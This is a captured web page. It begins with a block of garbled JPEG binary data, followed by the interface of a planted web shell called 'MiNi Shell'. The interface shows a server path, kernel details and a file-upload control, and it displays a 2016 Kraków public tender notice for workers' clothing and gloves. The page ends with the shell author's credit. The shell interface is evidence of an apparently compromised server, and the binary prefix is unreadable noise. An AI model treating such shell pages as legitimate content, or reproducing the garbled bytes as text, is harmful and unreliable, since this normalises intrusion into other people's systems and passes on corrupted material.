JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160224/41220-N-2016.html

<p class="kh_header"><b>Kraków: Zakup wraz z dostawą do siedziby Zamawiającego odzieży roboczej i rękawic dla pracowników MPO Sp. z o.o. w Krakowie</b><br>
<b>Numer ogłoszenia: 41220 - 2016; data zamieszczenia: 24.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Oczyszczania Sp. z o.o. , ul. Nowohucka 1, 31-580 Kraków, woj. małopolskie, tel. 012 6462202, faks 012 6462350.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpo.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wraz z dostawą do siedziby Zamawiającego odzieży roboczej i rękawic dla pracowników MPO Sp. z o.o. w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup wraz z dostawą do siedziby Zamawiającego odzieży roboczej oraz rękawic dla pracowników MPO Sp. z o.o. 
Zadanie nr 1 obejmuje między innymi zakup: 
-bluz, spodni typu ogrodniczki (letnich ubrań roboczych) 
-bluz (zimowych ubrań roboczych) 
-podkoszulków 
-bezrękawników 
-kurtek przeciwdeszczowych
-kompletów ochronnych przeciwdeszczowych
Zadanie nr 2 obejmuje zakup:
-rękawic roboczych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 18.14.10.00-9, 18.22.13.00-7, 18.22.32.00-0, 18.23.40.00-8, 18.23.54.00-9, 18.21.20.00-9, 18.31.84.00-5, 18.33.20.00-5, 18.44.33.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Wykonawca zaproszony do złożenia oferty będzie zobowiązany do wniesienia wadium w wysokości odpowiednio:
da zadania 1)    5 000 PLN. (słownie złotych: pięć tysięcy 00/100).
dla zadania 2)    5 000 PLN. (słownie złotych: pięć tysięcy 00/100).
2. Wadium można wnieść w jednej lub kilku następujących formach:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. nr 42 poz. 275 ze zm.).

3. Wadium w formie pieniężnej można wnieść na rachunek bankowy zamawiającego:
Bank Pekao SA  73 1240 4722 1111 0000 4851 5630
z adnotacją: wadium do przetargu nr TZ TT 5 2016

Uwaga!!!
- Zaleca się załączyć do oferty potwierdzenie złożenia wadium.
- Wadium w innych formach niż pieniądz należy złożyć w formie kserokopii (potwierdzonej za zgodność) załączonej do oferty. W kopercie zawierającej ofertę należy dodatkowo załączyć oryginał ww. dokumentu, który zostanie zwrócony na zasadach określonych w ustawie Prawo zamówień publicznych.
- Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 PZP.
- Datą wniesienia wadium w formie przelewu jest data uznania rachunku bankowego Zamawiającego.
- Oferta, która nie będzie zabezpieczona wadium, lub, gdy wadium zostanie wpłacone po upływie terminu wyznaczonego do składania ofert, zostanie odrzucona.
- Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust.2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału nie później niż w dniu, w którym upłynął termin składania ofert - podstawa prawna art. 26 ust. 3 oraz 46 ust. 4 a Pzp.
- Zwrot wadium nastąpi na zasadach określonych, w art. 46 ustawy Prawo zamówień</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie przedmiotowego zamówienia publicznego mogą ubiegać się Wykonawcy, którzy: 
a) spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych; 
b) nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i ust. 2 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie przedmiotowego zamówienia publicznego mogą ubiegać się Wykonawcy, którzy posiadają wiedzę i doświadczenie tj. 
Dla zadania nr 1: 
Wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie dostawy (rozumiane jako zawarte umowy) odzieży roboczej szytej na miarę dla pracowników fizycznych wykonujących pracę na zewnątrz, wykonaną w okresie nie dłuższym niż 12 miesięcy o wartości nie mniejszej niż 250 000,00 zł brutto (każda z dostaw).
Doświadczenie Wykonawcy jest punktowane 1 pkt, za każde wykonane zamówienie porównywalne (ponad warunek minimalny uczestnictwa). Przez zamówienie porównywalne Zamawiający rozumie dostawę (rozumianą jako zawarta umowa) odzieży roboczej szytej na miarę dla pracowników fizycznych wykonujących pracę na zewnątrz, wykonaną w okresie nie dłuższym niż 12 miesięcy o wartości nie mniejszej niż 250 000,00 zł brutto (każda z dostaw).
Dla zadania nr 2 : 
Wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie dostawy (rozumiane jako zawarte umowy) rękawic roboczych przeznaczonych dla pracowników fizycznych, wykonaną w okresie nie dłuższym niż 12 miesięcy o wartości nie mniejszej niż 150 000,00 zł brutto (każda z dostaw). Zamawiający nie uzna, iż Wykonawca spełnia ww. warunek uczestnictwa gdy ww. wykazane dostawy będą obejmować dostawę rękawic jednorazowych (gumowych,  lateksowych lub podobnych). 
Doświadczenie Wykonawcy jest punktowane 1 pkt za każde wykonane zamówienie porównywalne (ponad warunek minimalny uczestnictwa). Przez zamówienie porównywalne Zamawiający rozumie dostawę (rozumianą jako zawarta umowa) rękawic roboczych przeznaczonych dla pracowników fizycznych, wykonaną w okresie nie dłuższym niż 12 miesięcy o wartości nie mniejszej  niż 150 000,00 zł brutto (każda z dostaw). Zamawiający nie przydzieli punktu za wykazaną przez Wykonawcę dostawę obejmującą dostawę rękawic jednorazowych (gumowych, nitrylowych, lateksowych lub podobnych). 

Zgodnie z art. 24 ust. 2a Zamawiający wyklucza z postępowania o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>1. Zamawiający zaprosi do składania ofert przetargowych 5 (pięciu) wykonawców(odpowiednio dla zadania), którzy wykażą brak podstaw do wykluczenia z postępowania (art. 24 ust. 1 i ust. 2), spełnią warunki udziału w postępowaniu (art. 22 ust. 1) oraz posiadają największe doświadczenie i otrzymają największą ilość punktów (odpowiednio dla zadania). Jeżeli: 
a) liczba Wykonawców, którzy nie podlegają wykluczeniu i spełniają warunki udziału w postępowaniu będzie mniejsza niż 5 Zamawiający zaprosi do składania ofert przetargowych wszystkich Wykonawców (odpowiednio dla zadania). 
b) liczba Wykonawców, którzy nie podlegają wykluczeniu i spełniają warunki udziału w postępowaniu będzie większa niż 5, Zamawiający zaprosi do składania ofert przetargowych pięciu Wykonawców, którzy otrzymali największą ilość punktów w ramach kwalifikacji Wykonawców (odpowiednio dla zadania). 
2. Ocena Wykonawców zostanie dokonana w następujący sposób: Za każde wykazane zamówienie porównywalne co do przedmiotu zamówienia (zgodnie ze wzorem wykazu - załącznik 3b i/lub 4b do wniosku) jako zrealizowane zamówienie ponad ilość określoną jako minimalny warunek uczestnictwa w zakresie posiadanego doświadczenia zawodowego (Załącznik 3a i/lub 4a do wniosku) Wykonawca otrzyma 1 pkt (odpowiednio dla zadania). Przez zamówienie porównywalne  dla zadania nr 1: Zamawiający rozumie dostawę (rozumianą jako zawarta umowa) odzieży roboczej szytej na miarę dla pracowników fizycznych wykonujących pracę na zewnątrz,wykonaną w okresie nie dłuższym niż 12 miesięcy o wartości nie mniejszej niż 250 000,00 zł brutto (każda z dostaw). Przez zamówienie porównywalne  dla zadania nr 2 : Zamawiający rozumie dostawę (rozumianą jako zawarta umowa) rękawic roboczych przeznaczonych dla pracowników fizycznych, wykonaną w okresie nie dłuższym niż 12 miesięcy o wartości nie mniejszej niż 150 000,00 zł brutto (każda z dostaw). Zamawiający nie przydzieli punktu za wykazaną przez Wykonawcę dostawę obejmującą dostawę rękawic jednorazowych (gumowych, lateksowych lub podobnych). 
Punktowane będą jedynie dostawy, które zostały wykazane ponad dostawy potwierdzające spełnienie warunku udziału w postępowaniu. Punkty zostaną przyznane tylko w oparciu o dokumenty potwierdzające należyte wykonanie dostaw załączone do wniosku (odpowiednio dla zadania). Zamawiający zastrzega, że do wykazu nr 3b oraz 4b (dotyczącego dostaw punktowanych) nie będzie stosował art. 26 ust. 3 ustawy Prawo zamówień publicznych w zakresie uzupełnienia wykazu i dokumentów potwierdzających należyte wykonanie wskazanych dostaw, oraz art. 25 ust. 2b ustawy bowiem dostawy tam wskazane służą jedynie do dokonania kwalifikacji wykonawców na listę Wykonawców, którzy zostaną zaproszeni do składania ofert. 
3. Wniosek o dopuszczenie do udziału w postępowaniu wraz z dokumentami potwierdzającymi spełnienie warunków udziału w postępowaniu należy złożyć w formie pisemnej w zamkniętym opakowaniu, np. kopercie, na adres Zamawiającego: Miejskie Przedsiębiorstwo Oczyszczania Spółka z o. o., 31-580 Kraków, ul Nowohucka 1, Sekretariat Spółki, pokój numer 101 (I piętro), do godz. 11:00  dnia 03.03.2016 roku. W przypadku korzystania z usług pocztowych, Zamawiający uznaje za termin złożenia wniosku o dopuszczenie do udziału w postępowaniu termin i godzinę potwierdzenia odbioru przesyłki przez Zamawiającego. 
4. Wykonawca powinien umieścić wniosek o dopuszczenie do udziału w postępowaniu w zamkniętej kopercie lub opakowaniu, na którym należy podać następujące informacje:
 a)Wniosek o dopuszczenie do udziału w postępowaniu pn. Zakup wraz z dostawą do siedziby Zamawiającego odzieży roboczej i rękawic dla pracowników MPO Sp. z o.o. w Krakowie - Zadanie 1 i/lub Zadanie nr 2; 
b) Wykonawca: należy podać nazwę i adres. 
5. Wnioski o dopuszczenie do udziału w postępowaniu złożone po terminie będą zwracane bez otwierania. Zaleca się złożenie wniosku o dopuszczenie do udziału w postępowaniu, z wykorzystaniem załączników do wniosku na formularzach, których wzór w wersji elektronicznej zostanie udostępniony na stronie internetowej Zamawiającego (www.mpo.krakow.pl) od dnia publikacji niniejszego ogłoszenia w Biuletynie Zamówień Publicznych. Składane dokumenty winny być załączone do wniosku o dopuszczenie do udziału w postępowaniu w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę, przy czym: 
a) wniosek o dopuszczenie do udziału w przetargu ograniczonym oraz oświadczenie z art. 22 ust. 1 i 24 ust. 1 i ust. 2 winny zostać złożone w formie oryginału. 
b) pełnomocnictwo należy przedstawić w oryginale lub kserokopii poświadczonej notarialnie. 
6. Wniosek o dopuszczenie do udziału w postępowaniu (oraz załączniki do niego) winien być podpisany (podpis i imienna pieczątka lub czytelny podpis) przez Wykonawcę zgodnie z zasadami reprezentacji określonymi w dokumencie rejestrowym Wykonawcy, lub przez upoważniona do składania oświadczeń woli w jego imieniu, a w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia przez ustanowionego pomocnika. 
7. Wniosek o dopuszczenie do udziału w postępowaniu nie powinien zawierać żadnych nieczytelnych lub nieautoryzowanych poprawek i skreśleń. Ewentualne poprawki lub korekty błędów należy nanieść czytelnie oraz datować i zaopatrzyć podpisem co najmniej jednej z osób podpisujących wniosek. 
8. Zgodnie z dyspozycją przepisu art. 27 ust. 1 i 2 ustawy Pzp oświadczenia, wnioski zawiadomienia oraz informacje Zamawiający i Wykonawca przekazuje pisemnie lub faksem 
9. Jeżeli Zamawiający i Wykonawcy przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem, każda ze stron na żądanie drugiej, niezwłocznie potwierdza fakt ich otrzymania.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Jakość - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w zakresie i na zasadach określonych w projekcie umowy stanowiącym zał. nr 3a i 3b do SIWZ (odpowiednio dla zadania).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia zostanie przekazana tym wykonawcom, którzy zostaną zaproszeni do składania ofert..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2016 godzina 11:00, miejsce: Miejskie Przedsiębiorstwo Oczyszczania Sp. z o.o., ul. Nowohucka 1, 31-580 Kraków, Sekretariat Spółki - pokój 101..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup wraz z dostawą do siedziby Zamawiającego odzieży roboczej dla pracowników MPO Sp. z o.o. w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup wraz z dostawą do siedziby Zamawiającego odzieży roboczej dla pracowników MPO Sp. z o.o. w Krakowie a w szczególności zakup: - bluz, spodni typu ogrodniczki (letnich ubrań roboczych) - bluz, spodni typu ogrodniczki ocieplanych (zimowych ubrań roboczych) - podkoszulków - bezrękawników - kurtek przeciwdeszczowych - kompletów ochronnych przeciwdeszczowych  Szczegółowy opis przedmiotu zamówienia zawiera specyfikacja istotnych warunków zamówienia a w szczególności załączniki 1-1j1 do SIWZ, która zostanie przekazana Wykonawcom zaproszonym do składania ofert przetargowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 18.22.13.00-7, 18.22.32.00-0, 18.23.40.00-8, 18.23.54.00-9, 18.31.20.00-9, 18.31.84.00-5, 18.33.20.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Jakość - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup wraz z dostawą do siedziby Zamawiającego rękawic dla pracowników MPO Sp. z o.o. w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w zakresie zadania 2 jest zakup wraz z dostawą do siedziby Zamawiającego rękawic roboczych dla pracowników MPO Sp. z o.o. w Krakowie Szczegółowy opis przedmiotu zamówienia zawiera specyfikacja  a istotnych warunków zamówienia, która zostanie przekazana Wykonawcom zaproszonym do składania ofert przetargowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.14.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Jakość - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com